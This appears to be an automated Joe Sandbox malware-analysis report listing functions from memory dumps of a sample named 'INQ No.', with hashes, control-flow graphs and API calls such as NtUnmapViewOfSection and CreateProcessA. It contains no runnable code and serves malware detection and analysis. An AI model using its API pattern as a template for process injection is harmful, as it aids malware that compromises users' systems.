                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Nq
                                                                                                                                                                            • API String ID: 0-1575210091
                                                                                                                                                                            • Opcode ID: e12fc0d4d0e57bfda4305b5a9175962b5b701cd271337bfd140eac52210e944a
                                                                                                                                                                            • Instruction ID: 483ef643cc49445f0ee4ebbfea87bebc779778d780452a91711c9ebdbf4920a2
                                                                                                                                                                            • Opcode Fuzzy Hash: e12fc0d4d0e57bfda4305b5a9175962b5b701cd271337bfd140eac52210e944a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3AB3B534A11219CFCB64DB24C898A99B7B6FF8A305F1151E9D50DAB761DB32AEC1CF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07869DA8 Relevance: 1.9, APIs: 1, Instructions: 366COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2338 7869da8-7869dca 2339 7869dd0-7869e0b call 7869340 call 7869350 call 7869360 2338->2339 2340 786a179-786a17e 2338->2340 2353 7869e1e-7869e3e 2339->2353 2354 7869e0d-7869e17 2339->2354 2341 786a180-786a182 2340->2341 2342 786a188-786a19a call 7868858 2340->2342 2341->2342 2348 786a1a0-786a1a7 2342->2348 2356 7869e40-7869e4a 2353->2356 2357 7869e51-7869e71 2353->2357 2354->2353 2356->2357 2359 7869e84-7869ea4 2357->2359 2360 7869e73-7869e7d 2357->2360 2362 7869ea6-7869eb0 2359->2362 2363 7869eb7-7869ec0 call 7869370 2359->2363 2360->2359 2362->2363 2366 7869ee4-7869eed call 7869380 2363->2366 2367 7869ec2-7869edd call 7869370 2363->2367 2372 7869f11-7869f1a call 7869390 2366->2372 2373 7869eef-7869f0a call 7869380 2366->2373 2367->2366 2379 7869f25-7869f41 2372->2379 2380 7869f1c-7869f20 call 78693a0 2372->2380 2373->2372 2384 7869f43-7869f49 2379->2384 2385 7869f59-7869f5d 2379->2385 2380->2379 2386 7869f4d-7869f4f 2384->2386 2387 7869f4b 2384->2387 2388 7869f77-7869fbf 2385->2388 2389 7869f5f-7869f70 call 78693b0 2385->2389 2386->2385 2387->2385 2395 7869fe3-7869fea 2388->2395 2396 7869fc1 2388->2396 2389->2388 2398 786a001-786a00f call 78693c0 2395->2398 2399 7869fec-7869ffb 2395->2399 2397 7869fc4-7869fca 2396->2397 2401 7869fd0-7869fd6 2397->2401 2402 786a1a8-786a1de 2397->2402 2407 786a011-786a013 2398->2407 2408 786a019-786a042 call 7868858 call 78693d0 2398->2408 2399->2398 2405 7869fe0-7869fe1 2401->2405 2406 7869fd8-7869fda 2401->2406 2411 786a1e5-786a20a KiUserExceptionDispatcher 2402->2411 2412 786a1e0 2402->2412 2405->2395 2405->2397 2406->2405 2407->2408 2418 786a044-786a052 2408->2418 2419 786a06f-786a08b 2408->2419 2414 786a20c-786a215 2411->2414 2412->2411 2418->2419 2424 786a054-786a068 2418->2424 2422 786a09e-786a0c5 call 78693e0 2419->2422 2423 786a08d-786a097 2419->2423 2429 786a0c7-786a0cd 2422->2429 2430 786a0dd-786a0e1 2422->2430 2423->2422 2424->2419 2431 786a0d1-786a0d3 2429->2431 2432 786a0cf 2429->2432 2433 786a0e3-786a0f5 2430->2433 2434 786a0fc-786a118 2430->2434 2431->2430 2432->2430 2433->2434 2437 786a130-786a134 2434->2437 2438 786a11a-786a120 2434->2438 2437->2348 2441 786a136-786a144 2437->2441 2439 786a124-786a126 2438->2439 2440 786a122 2438->2440 2439->2437 2440->2437 2443 786a156-786a15a 2441->2443 2444 786a146-786a154 2441->2444 2445 786a160-786a178 2443->2445 2444->2443 2444->2445
                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0786A1EF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                            • Opcode ID: 69e4d12ce26161cd88f6b69f8a5b516a01ec3986000c8ab008e828b41e5cd483
                                                                                                                                                                            • Instruction ID: d769a0527161f20a554a3ff58457e30b03fd21e383afc68169744ff8244252ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 69e4d12ce26161cd88f6b69f8a5b516a01ec3986000c8ab008e828b41e5cd483
                                                                                                                                                                            • Instruction Fuzzy Hash: 86D189B0700206AFDB29EB79C454BAEB7E6AF99700F14846DD106DB3D0DB35E905CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865E18 Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 07865E85
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SectionUnmapView
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 498011366-0
                                                                                                                                                                            • Opcode ID: b9f3b000e6673f7f4818237357d92547fdfa41012a5ca308a81ae59dd7071356
                                                                                                                                                                            • Instruction ID: 0162f55969443dc40ee8d5345fa3b494dacffa3669e42565e9e8803085e7cb6a
                                                                                                                                                                            • Opcode Fuzzy Hash: b9f3b000e6673f7f4818237357d92547fdfa41012a5ca308a81ae59dd7071356
                                                                                                                                                                            • Instruction Fuzzy Hash: E81156B5D003498FDB20DFAAC845BEEFBF5EF48320F108819D819A7240CB35A940CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D9BC0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tIh
                                                                                                                                                                            • API String ID: 0-443931868
                                                                                                                                                                            • Opcode ID: cdd85e2b3c1b140a45cd3f61ab2dac5171411dc4d4890a5165880d0e2fab7dde
                                                                                                                                                                            • Instruction ID: 60c742b09176dbeaab7e9401b39408c83b94255dadbe59af20d9de288cea0c2e
                                                                                                                                                                            • Opcode Fuzzy Hash: cdd85e2b3c1b140a45cd3f61ab2dac5171411dc4d4890a5165880d0e2fab7dde
                                                                                                                                                                            • Instruction Fuzzy Hash: 57D132B0E1420ADFCB04CFAAC5848AEFBB6FF99314F109559D416EB254D734AA42CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865E20 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 07865E85
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SectionUnmapView
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 498011366-0
                                                                                                                                                                            • Opcode ID: 64b2a1f305d96cbc0145992b5d0c309fb0373150385af0c45a5a6cf4012b90ef
                                                                                                                                                                            • Instruction ID: bdb76324a51047a197861dc5401ecaa9e38b761a185dfdd89d0b216170578432
                                                                                                                                                                            • Opcode Fuzzy Hash: 64b2a1f305d96cbc0145992b5d0c309fb0373150385af0c45a5a6cf4012b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 001146B5D003498FDB20DFAAC845BDEFBF5EB48320F108419D519A7240CA35A944CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D7A20 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )"
                                                                                                                                                                            • API String ID: 0-4237191880
                                                                                                                                                                            • Opcode ID: 07d39f94835e29677c8fe16c467a105928cc9c99d2cb8d6097d673d06f772255
                                                                                                                                                                            • Instruction ID: 0890fce963947a357443abca05e04a48acab689bde77ad708f1233ded54f024a
                                                                                                                                                                            • Opcode Fuzzy Hash: 07d39f94835e29677c8fe16c467a105928cc9c99d2cb8d6097d673d06f772255
                                                                                                                                                                            • Instruction Fuzzy Hash: B781D5B4E002099FDB08CFAAC9846EEFBB2FF89314F14902AD515AB358D7359946CF54
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 058A1808 Relevance: .6, Instructions: 588COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 10bfdd5cc443791b964b1b4fff4cd33f68e6ca384baa12992974da01e93071d3
                                                                                                                                                                            • Instruction ID: 176c14ba56a54a0fdd149bb633cfaf5671fc200bbebb589e2b22cef7b733bee2
                                                                                                                                                                            • Opcode Fuzzy Hash: 10bfdd5cc443791b964b1b4fff4cd33f68e6ca384baa12992974da01e93071d3
                                                                                                                                                                            • Instruction Fuzzy Hash: E3524E34A003158FDB14DF28C844B99B7B2BF85314F2582E9D559AF3A1DB71AE86CF81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 058A17F8 Relevance: .6, Instructions: 576COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 573b6e9e097bd805ee821fce974ed07e42119e2aff6d0b09d8052a9c9ddb142b
                                                                                                                                                                            • Instruction ID: 16d6e878b201a04d902571160055fa07606af7d6222422227cabede97fc99628
                                                                                                                                                                            • Opcode Fuzzy Hash: 573b6e9e097bd805ee821fce974ed07e42119e2aff6d0b09d8052a9c9ddb142b
                                                                                                                                                                            • Instruction Fuzzy Hash: 22525E34A003568FDB14DF28C844B99B7B2BF85314F2582E9D5586F3A1DB71AE86CF81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C1CC4 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c67fee2b7688b060f4a4105dddd73b7ddb078686f09e5b4238e04c9668f982c2
                                                                                                                                                                            • Instruction ID: 170ab765e8d6dc6f9360678cd790daff5c9f6d8c1cd45da1ccffbfdaa03b6338
                                                                                                                                                                            • Opcode Fuzzy Hash: c67fee2b7688b060f4a4105dddd73b7ddb078686f09e5b4238e04c9668f982c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 82A1AF35E003199FCB14DFA4D8849DDFFBAFF9A310F148259E416AB265EB30A941DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DCC18 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 136f30b9beae4670e90d3ecfe6003f6b186d51c3d99770b30d93692ca8512e60
                                                                                                                                                                            • Instruction ID: 965052127727ecdf51ba738d2ec5ac2789eecd7a0539a6293d481dc0b5db5887
                                                                                                                                                                            • Opcode Fuzzy Hash: 136f30b9beae4670e90d3ecfe6003f6b186d51c3d99770b30d93692ca8512e60
                                                                                                                                                                            • Instruction Fuzzy Hash: 869126B0D15208DFDB08CFA5D58099DFBB6FB9A314F20A42AE506FB264D7349941CF24
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C1CB8 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 22bf6627772184d0343ea0fe89e3f842c5900a826142b265bfb194bc7f19ae70
                                                                                                                                                                            • Instruction ID: d7e07caf75dde7e90133d0af794038cdfe8e0196645374d485d31d9a70c1c7b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 22bf6627772184d0343ea0fe89e3f842c5900a826142b265bfb194bc7f19ae70
                                                                                                                                                                            • Instruction Fuzzy Hash: 7791BF35E103199FCB14DFA4D8849DDFFBAFF9A310F148259E406AB265EB30A941DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C2B11 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 89649c8dc9e8db94f07806bf8ed7e4856c44f1f4995f1c75cc5100b88784e479
                                                                                                                                                                            • Instruction ID: 74f6f126c63d5d285b778566e9a05a79fae2a178783e01627e4e3b624d374917
                                                                                                                                                                            • Opcode Fuzzy Hash: 89649c8dc9e8db94f07806bf8ed7e4856c44f1f4995f1c75cc5100b88784e479
                                                                                                                                                                            • Instruction Fuzzy Hash: BF91BF35E003199FCB14DFA4D8849DDFFBAFF99310F148259E406AB264EB30A941DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DC900 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 41b83490c54acaa23729ecf17ab42340c1158044dc377607669b81ab679774c5
                                                                                                                                                                            • Instruction ID: 84c37a80f758dbd77efc922cc8ba0c051deb8d234912df76b199da786b1de7ef
                                                                                                                                                                            • Opcode Fuzzy Hash: 41b83490c54acaa23729ecf17ab42340c1158044dc377607669b81ab679774c5
                                                                                                                                                                            • Instruction Fuzzy Hash: A681F2B4E1521ADFCF04CFAAC9809EEFBB2FB99200F10995AD415B7254D7349902CFA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07860127 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1c9e88bced1af5083e7b156854ba8720f79fd9957bda4ae6af3da437878abf64
                                                                                                                                                                            • Instruction ID: fcd3b014682187c9b9e08243a00c4e9f696996088f76cfb7785974782b23ed9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c9e88bced1af5083e7b156854ba8720f79fd9957bda4ae6af3da437878abf64
                                                                                                                                                                            • Instruction Fuzzy Hash: 61212BB1D146589BEB18CFABC8547EEBFF6AFDA304F04C06AC409A6254EB740945CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D8D10 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 750c8d9e79b3f56e310228a04cb6f4dbe96d9d2695e27cbc1182e6e1c3f10450
                                                                                                                                                                            • Instruction ID: eb2af0e482e9650c9be3b9235a2be835f2e7d4470d85673270c95e2333bc7337
                                                                                                                                                                            • Opcode Fuzzy Hash: 750c8d9e79b3f56e310228a04cb6f4dbe96d9d2695e27cbc1182e6e1c3f10450
                                                                                                                                                                            • Instruction Fuzzy Hash: 9321E9B1E006189BEB18CFABD9552DEFBF7EFC9310F14C06AD509A6258DB701A46CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07860138 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8623b5c91c3b2ef622342eb4130b0143430eb29581561648924e90b24b1a5ddf
                                                                                                                                                                            • Instruction ID: e715f94543fe9cc1bfa8f3b2edc6c9afac564e8bc8536ee9d52e4653893bb545
                                                                                                                                                                            • Opcode Fuzzy Hash: 8623b5c91c3b2ef622342eb4130b0143430eb29581561648924e90b24b1a5ddf
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D2109B0D146189BEB18CFA7C8157EEFAF7AFC9304F04C069C409B6254EB7409458F94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DA200 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2323 78da200-78da21e 2324 78da225-78da22d call 78da2f8 2323->2324 2325 78da220 2323->2325 2326 78da233 2324->2326 2325->2324 2327 78da23a-78da256 2326->2327 2328 78da25f-78da260 2327->2328 2329 78da258 2327->2329 2330 78da2cd-78da2d1 2328->2330 2329->2326 2329->2328 2329->2330 2331 78da2a6-78da2c8 2329->2331 2332 78da262-78da276 2329->2332 2331->2327 2334 78da289-78da290 2332->2334 2335 78da278-78da287 2332->2335 2336 78da297-78da2a4 2334->2336 2335->2336 2336->2327
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 3H5$3H5
                                                                                                                                                                            • API String ID: 0-2752242361
                                                                                                                                                                            • Opcode ID: 5f70a55babc04e2c0ffaa7e23855e5b88e2f96779661bdbf5e55b52242e83d18
                                                                                                                                                                            • Instruction ID: e715d5212ccc53a72ab736d5711343db945563e95db978cf1f874dad59cab5dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f70a55babc04e2c0ffaa7e23855e5b88e2f96779661bdbf5e55b52242e83d18
                                                                                                                                                                            • Instruction Fuzzy Hash: 962107B4D10209DFDB48DFAAC540AAEFBF1BF99200F24C56A9508A7214E7319E45CB42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078662CC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2448 78662cc-786636d 2450 78663a6-78663c6 2448->2450 2451 786636f-7866379 2448->2451 2456 78663ff-786642e 2450->2456 2457 78663c8-78663d2 2450->2457 2451->2450 2452 786637b-786637d 2451->2452 2454 78663a0-78663a3 2452->2454 2455 786637f-7866389 2452->2455 2454->2450 2458 786638d-786639c 2455->2458 2459 786638b 2455->2459 2467 7866467-7866521 CreateProcessA 2456->2467 2468 7866430-786643a 2456->2468 2457->2456 2461 78663d4-78663d6 2457->2461 2458->2458 2460 786639e 2458->2460 2459->2458 2460->2454 2462 78663d8-78663e2 2461->2462 2463 78663f9-78663fc 2461->2463 2465 78663e6-78663f5 2462->2465 2466 78663e4 2462->2466 2463->2456 2465->2465 2470 78663f7 2465->2470 2466->2465 2479 7866523-7866529 2467->2479 2480 786652a-78665b0 2467->2480 2468->2467 2469 786643c-786643e 2468->2469 2471 7866440-786644a 2469->2471 2472 7866461-7866464 2469->2472 2470->2463 2474 786644e-786645d 2471->2474 2475 786644c 2471->2475 2472->2467 2474->2474 2476 786645f 2474->2476 2475->2474 2476->2472 2479->2480 2490 78665b2-78665b6 2480->2490 2491 78665c0-78665c4 2480->2491 2490->2491 2492 78665b8 2490->2492 2493 78665c6-78665ca 2491->2493 2494 78665d4-78665d8 2491->2494 2492->2491 2493->2494 2495 78665cc 2493->2495 2496 78665da-78665de 2494->2496 2497 78665e8-78665ec 2494->2497 2495->2494 2496->2497 2500 78665e0 2496->2500 2498 78665fe-7866605 2497->2498 2499 78665ee-78665f4 2497->2499 2501 7866607-7866616 2498->2501 2502 786661c 2498->2502 2499->2498 2500->2497 2501->2502 2504 786661d 2502->2504 2504->2504
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786650E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: ae0c70172b200c48deac8fba90702056e0a31ddc9855a148e464f94ac5c57dad
                                                                                                                                                                            • Instruction ID: bce60cbcc0a155992fe44f7af4c2eeacba400c533f83da18efed5630be108d81
                                                                                                                                                                            • Opcode Fuzzy Hash: ae0c70172b200c48deac8fba90702056e0a31ddc9855a148e464f94ac5c57dad
                                                                                                                                                                            • Instruction Fuzzy Hash: 82A14AB1E0025ADFEB20CF68C845BEDBBB2AF58314F148169D808E7244EB759985CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078662D8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2505 78662d8-786636d 2507 78663a6-78663c6 2505->2507 2508 786636f-7866379 2505->2508 2513 78663ff-786642e 2507->2513 2514 78663c8-78663d2 2507->2514 2508->2507 2509 786637b-786637d 2508->2509 2511 78663a0-78663a3 2509->2511 2512 786637f-7866389 2509->2512 2511->2507 2515 786638d-786639c 2512->2515 2516 786638b 2512->2516 2524 7866467-7866521 CreateProcessA 2513->2524 2525 7866430-786643a 2513->2525 2514->2513 2518 78663d4-78663d6 2514->2518 2515->2515 2517 786639e 2515->2517 2516->2515 2517->2511 2519 78663d8-78663e2 2518->2519 2520 78663f9-78663fc 2518->2520 2522 78663e6-78663f5 2519->2522 2523 78663e4 2519->2523 2520->2513 2522->2522 2527 78663f7 2522->2527 2523->2522 2536 7866523-7866529 2524->2536 2537 786652a-78665b0 2524->2537 2525->2524 2526 786643c-786643e 2525->2526 2528 7866440-786644a 2526->2528 2529 7866461-7866464 2526->2529 2527->2520 2531 786644e-786645d 2528->2531 2532 786644c 2528->2532 2529->2524 2531->2531 2533 786645f 2531->2533 2532->2531 2533->2529 2536->2537 2547 78665b2-78665b6 2537->2547 2548 78665c0-78665c4 2537->2548 2547->2548 2549 78665b8 2547->2549 2550 78665c6-78665ca 2548->2550 2551 78665d4-78665d8 2548->2551 2549->2548 2550->2551 2552 78665cc 2550->2552 2553 78665da-78665de 2551->2553 2554 78665e8-78665ec 2551->2554 2552->2551 2553->2554 2557 78665e0 2553->2557 2555 78665fe-7866605 2554->2555 2556 78665ee-78665f4 2554->2556 2558 7866607-7866616 2555->2558 2559 786661c 2555->2559 2556->2555 2557->2554 2558->2559 2561 786661d 2559->2561 2561->2561
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786650E
                                                                                                                                                                            Memory Dump Source
